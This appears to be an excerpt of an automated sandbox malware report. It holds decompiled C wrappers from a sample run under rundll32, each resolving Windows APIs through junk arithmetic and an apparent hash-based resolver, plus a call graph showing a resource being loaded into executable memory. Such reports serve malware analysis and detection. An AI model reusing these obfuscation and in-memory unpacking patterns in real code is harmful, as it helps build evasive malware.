                                                                                                                      				_v16 = _v16 ^ 0x01b79e59;
                                                                                                                      				_v12 = 0x5a8921;
                                                                                                                      				_v12 = _v12 / _t52;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x000807b1;
                                                                                                                      				_v8 = 0x5c56e6;
                                                                                                                      				_v8 = _v8 ^ 0x7431396c;
                                                                                                                      				_v8 = _v8 + 0xffff5a5b;
                                                                                                                      				_v8 = _v8 + 0x50a9;
                                                                                                                      				_v8 = _v8 ^ 0x74635491;
                                                                                                                      				E00222D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
                                                                                                                      				_t50 = CloseHandle(_a4); // executed
                                                                                                                      				return _t50;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00234E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 2ceb6298e023b5a53284244d8ef7d629fbf82d39ebbe56be47d392e2ad440e48
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: D5113476D0060CFFDB05DFE5D84A89EBBB0EB40314F50C088E914A6255D7B99B688F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0023679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E00222D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0023685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: c69c846a55961083beaf1192aa3dd8e695cf218acf14bee35299bd59a44a535a
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 5621D572900248BBCF119F95CD09CDFBFB9EB99714F008149FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0023E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t34;
                                                                                                                      				void* _t41;
                                                                                                                      				long _t45;
                                                                                                                      				long _t46;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_t45 = __edx;
                                                                                                                      				_push(_a36);
                                                                                                                      				_t46 = __ecx;
                                                                                                                      				_push(_a32);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t34);
                                                                                                                      				_v16 = 0x974c12;
                                                                                                                      				_v16 = _v16 * 0x75;
                                                                                                                      				_v16 = _v16 ^ 0x4529a886;
                                                                                                                      				_v12 = 0x89ee90;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x0001fd6b;
                                                                                                                      				_v8 = 0x2afb1;
                                                                                                                      				_v8 = _v8 + 0xffff660b;
                                                                                                                      				_v8 = _v8 | 0x1aac0731;
                                                                                                                      				_v8 = _v8 ^ 0x1aae47e7;
                                                                                                                      				E00222D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
                                                                                                                      				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
                                                                                                                      				return _t41;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0023E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: 4a8fc555aa2c44436eb4666a3a34cc12a26ef029cd1bf577c481fb25beaade5c
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: 9011147690120CBFDF059ED5DC86CDEBFB9EB48354F148198F924A6210D2768A24DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00227A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t37;
                                                                                                                      				void* _t45;
                                                                                                                      				long _t48;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t48 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t37);
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0xfcacd9;
                                                                                                                      				_v8 = 0xc1635f;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 * 0x50;
                                                                                                                      				_v8 = _v8 * 0x36;
                                                                                                                      				_v8 = _v8 ^ 0x197e1637;
                                                                                                                      				_v16 = 0x23fde3;
                                                                                                                      				_v16 = _v16 << 0xf;
                                                                                                                      				_v16 = _v16 + 0x8916;
                                                                                                                      				_v16 = _v16 ^ 0xfef173e1;
                                                                                                                      				_v12 = 0xdffc87;
                                                                                                                      				_v12 = _v12 | 0x0f84fa40;
                                                                                                                      				_v12 = _v12 ^ 0x35513bb9;
                                                                                                                      				_v12 = _v12 ^ 0x3a8da81e;
                                                                                                                      				E00222D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
                                                                                                                      				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
                                                                                                                      				return _t45;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00227AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: a0b235ada7d0e492a1e1e3ee5640c9ec0ea84ef8da4b6ee361d88e79e136eb6d
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: E011E2B2C0121CFBDF05DF94DA4A8EEBBB4EB14304F14C099E9116A251D7B15B24AF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00222E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t35;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t35);
                                                                                                                      				_v16 = 0xae7ad3;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 >> 9;
                                                                                                                      				_v16 = _v16 ^ 0x000b5401;
                                                                                                                      				_v12 = 0xf75da6;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0xa35c;
                                                                                                                      				_v12 = _v12 ^ 0x00021a7e;
                                                                                                                      				_v8 = 0xb7fdd7;
                                                                                                                      				_v8 = _v8 * 0x34;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 | 0x8cd68937;
                                                                                                                      				_v8 = _v8 ^ 0x8cd3b3e5;
                                                                                                                      				E00222D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
                                                                                                                      				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
                                                                                                                      				return _t42;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00222F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction ID: b6fcb4d07e1764d7f8367379d95e31066fb88136e55ecc4775debcbc2e2a55aa
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: FD11CE72C0121CFBCF05DFE4D94A88DBBB1EB14308F20C098F915A6265E3729B64AF81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0022BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      				WCHAR* _t40;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t40 = __ecx;
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t30);
                                                                                                                      				_v12 = 0xf8a4b;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0xa9327f6f;
                                                                                                                      				_v12 = _v12 ^ 0x26166746;
                                                                                                                      				_v12 = _v12 ^ 0x8f266abd;
                                                                                                                      				_v16 = 0xc512b4;
                                                                                                                      				_v16 = _v16 ^ 0xa05564f8;
                                                                                                                      				_v16 = _v16 | 0x9f0a4514;
                                                                                                                      				_v16 = _v16 ^ 0xbf9c633f;
                                                                                                                      				_v8 = 0x850486;
                                                                                                                      				_v8 = _v8 * 0x26;
                                                                                                                      				_v8 = _v8 + 0xffff9e70;
                                                                                                                      				_v8 = _v8 >> 0xf;
                                                                                                                      				_v8 = _v8 ^ 0x00077990;
                                                                                                                      				E00222D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
                                                                                                                      				_t37 = DeleteFileW(_t40); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: f1ca87f37957425a424458a63fd19b363435eb9e362aef7755df6a82eab40afd
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: CC01F374C01218BBDB54EFA5C98A4DEBFB4EF00300F208189E825AA215D7B41B559F96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002407D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				struct HINSTANCE__* _t39;
                                                                                                                      				signed int _t41;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0022CF25(_t30);
                                                                                                                      				_v12 = 0x89457d;
                                                                                                                      				_v12 = _v12 ^ 0x6b886c65;
                                                                                                                      				_v12 = _v12 | 0xf6315bef;
                                                                                                                      				_v12 = _v12 ^ 0xff319cd3;
                                                                                                                      				_v8 = 0xe31a0f;
                                                                                                                      				_t41 = 0xa;
                                                                                                                      				_v8 = _v8 * 0x1b;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0xfe799add;
                                                                                                                      				_v16 = 0x93f3d7;
                                                                                                                      				_v16 = _v16 / _t41;
                                                                                                                      				_v16 = _v16 ^ 0x00076e75;
                                                                                                                      				E00222D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
                                                                                                                      				_t39 = LoadLibraryW(_a4); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00240861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 052b6af613ddd228fc97159cdbe02e081719728e45761e67307958f62f73c983
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 8C011075D0520CFBCB08EFE4D94A98EBBB1EB40304F208099A915AB261E7B15B649F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0023E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0022CF25(_t30);
                                                                                                                      				_v16 = 0x8c64b0;
                                                                                                                      				_v16 = _v16 + 0x962b;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_v16 = _v16 ^ 0x000da62a;
                                                                                                                      				_v12 = 0xb02c29;
                                                                                                                      				_v12 = _v12 * 0x73;
                                                                                                                      				_v12 = _v12 + 0xffff997c;
                                                                                                                      				_v12 = _v12 ^ 0x4f272bd9;
                                                                                                                      				_v8 = 0x94952e;
                                                                                                                      				_v8 = _v8 + 0xa237;
                                                                                                                      				_v8 = _v8 ^ 0xcd764018;
                                                                                                                      				_v8 = _v8 + 0x8874;
                                                                                                                      				_v8 = _v8 ^ 0xcdeaa0fe;
                                                                                                                      				E00222D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
                                                                                                                      				_t37 = SHFileOperationW(_a8); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0023E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: d5753667ee4a773a2c526b0b6b7b9301d095ba73a6b1c5ccae5b1c116f74c460
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: 2E0113B1C00308FBDF51DFE8E94A88DBBB0EF00314F20C188E81466255E7B58B589F41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00233CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E00222D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00233D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 38dea9cfe88328c5918c71727ff0b0c646d40e89ecfd507dcc25a4188e3de249
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: CF01E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0023FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0022CF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E00222D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0023FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.521755216.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.521781158.0000000000245000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 2830f45d3f6a0726058c68c9db63d9e697c0b1210a1759e70e15ad57801c51e1
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 60010276D00208BFDF05EFE4D94A89EBBB1AB44304F108098E9146A250DBB69B649F41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
